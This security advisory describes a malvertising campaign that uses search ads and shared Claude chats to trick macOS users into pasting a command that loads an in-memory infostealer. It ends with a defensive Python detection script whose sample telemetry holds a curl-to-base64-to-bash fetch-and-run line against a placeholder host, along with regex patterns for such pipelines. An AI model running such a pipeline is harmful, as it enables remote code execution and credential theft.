An active campaign is exploiting two vectors that users tend to trust: sponsored search-engine ads and the sharing features of AI platforms. Instead of redirecting to a spoofed domain, the attackers place ads that point to claude.ai and host, inside publicly shared chats, malicious instructions that induce the user to paste a command into Terminal; that command downloads and runs a compressed, obfuscated script that executes in memory and steals credentials and system data on macOS.
The technique combines social engineering with abuse of trust in legitimate services: the ad looks legitimate because it displays Anthropic's real domain as its destination, and the malicious content lives inside a public Claude conversation. The finding was brought to light by a researcher on LinkedIn, and it also shows how easily a malicious actor can reuse legitimate infrastructure to distribute payloads without needing to create an easily detectable website (see the researcher's publication).

Technically, the commands the user is told to paste into Terminal retrieve a first-stage loader, decompress it and run it in memory; the loader fingerprints the host (external IP address, macOS version, keyboard layout) and then downloads a second stage that runs via osascript. In some observed variants, delivery to machines with keyboard layouts from certain regions is filtered out; in others the payload behaves as a MacSync-type infostealer and exfiltrates cookies, browser credentials and Keychain contents. Some of these artifacts are publicly documented in analysis repositories such as VirusTotal (sample in VirusTotal).
This attack highlights an uncomfortable truth: the legitimacy of the destination domain is no longer a guarantee of safety. When platforms allow publicly shared content and search engines accept paid ads that lead to that content, attackers obtain a powerful combination: mass visibility and the appearance of trustworthiness. In addition, fileless in-memory execution and the use of osascript make detection difficult for traditional methods that focus on on-disk artifacts.
For individual users, the practical recommendation is clear and urgent: do not paste commands into Terminal that come from search results, ads or shared chats. If you need to install a native application, go directly to the official vendor's website and follow the installation documentation published there; for example, always check the documentation on Anthropic's website before running Claude-related tools (Anthropic). Also enable two-factor authentication and, wherever possible, use physical security keys (WebAuthn) for critical accounts.
For corporate security officers and system administrators, this incident calls for layered defenses: blocking and filtering suspicious domains at the DNS level, EDR rules that alert on osascript executions, monitoring of processes that decode or execute content in memory, and detection of outbound traffic to exfiltration infrastructure. It is also advisable to apply MDM policies that restrict script execution by non-administrative users and to educate staff about the risk of pasting commands without verifying their origin.
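As an added illustration (not from the article or the researchers it cites), the following Python script implements two of the EDR signals listed above over constructed process telemetry: a decode-and-execute shell pipeline, and osascript launched from an interactive Terminal session whose ancestor fetched remote content. The event records, the URL and the script paths are placeholders; keying the osascript rule on ancestry keeps legitimately scheduled scripts from alerting.

```python
"""Detect the paste-into-Terminal pattern over EDR-style process events."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    name: str
    cmdline: str


# Constructed sample telemetry; domain and paths are placeholders, not real IoCs.
EVENTS = [
    ProcEvent(100, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ProcEvent(101, 100, "zsh", "-zsh"),
    ProcEvent(102, 101, "bash", 'bash -c "curl -fsSL https://example.invalid/s | base64 -d | bash"'),
    ProcEvent(103, 102, "osascript", "osascript -e '(placeholder second stage)'"),
    ProcEvent(200, 1, "launchd", "/sbin/launchd"),
    ProcEvent(201, 200, "osascript", "osascript /Library/Scripts/placeholder-backup.scpt"),  # benign
]

# Decoder/decompressor whose output is piped straight into a shell (in-memory payload).
DECODE_EXEC = re.compile(
    r"(base64\s+(-d|--decode)|gunzip|gzip\s+-d|xxd\s+-r|openssl\s+enc\s+-d)[^|]*\|\s*(ba|z)?sh\b"
)
FETCH = re.compile(r"\b(curl|wget)\b")


def ancestors(ev, by_pid):
    """Walk the parent chain while the parent is present in the telemetry."""
    chain = []
    while ev.ppid in by_pid:
        ev = by_pid[ev.ppid]
        chain.append(ev)
    return chain


def detect(events):
    """Return (pid, reason) alerts for the two signals described in the article."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if DECODE_EXEC.search(e.cmdline):
            alerts.append((e.pid, "decode-and-execute pipeline (in-memory payload)"))
        if e.name == "osascript":
            chain = ancestors(e, by_pid)
            if any(a.name == "Terminal" for a in chain) and any(FETCH.search(a.cmdline) for a in chain):
                alerts.append((e.pid, "osascript under a Terminal session that fetched remote content"))
    return alerts


if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(f"ALERT pid={pid}: {reason}")
```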

If you think you have followed the malicious instructions, disconnect the device from the network, do not use that machine to recover accounts, and from a clean computer change passwords, revoke tokens and active sessions, and review alerts for unusual access. Also consider a forensic analysis or restoring from a trusted backup; evicting actors who have had access to the Keychain or to session cookies may require rotating credentials and reviewing certificates or tokens.
Finally, platforms and advertisers must strengthen their controls: ad systems need stronger signals to identify destinations that leverage user-generated content to distribute executable instructions, and AI platforms should improve mechanisms for quickly removing shared chats that contain dangerous commands. In the meantime, all users should adopt operational scepticism toward technical instructions from unverified sources and report any suspicious ad or resource to the platform owners and the search engine.
See also the report published by security researchers on BleepingComputer (in BleepingComputer) and the sample entries in malware analysis services such as VirusTotal (alternative sample in VirusTotal); the report likewise reminds readers to report any suspicious ad or chat to the relevant platforms to speed up its mitigation.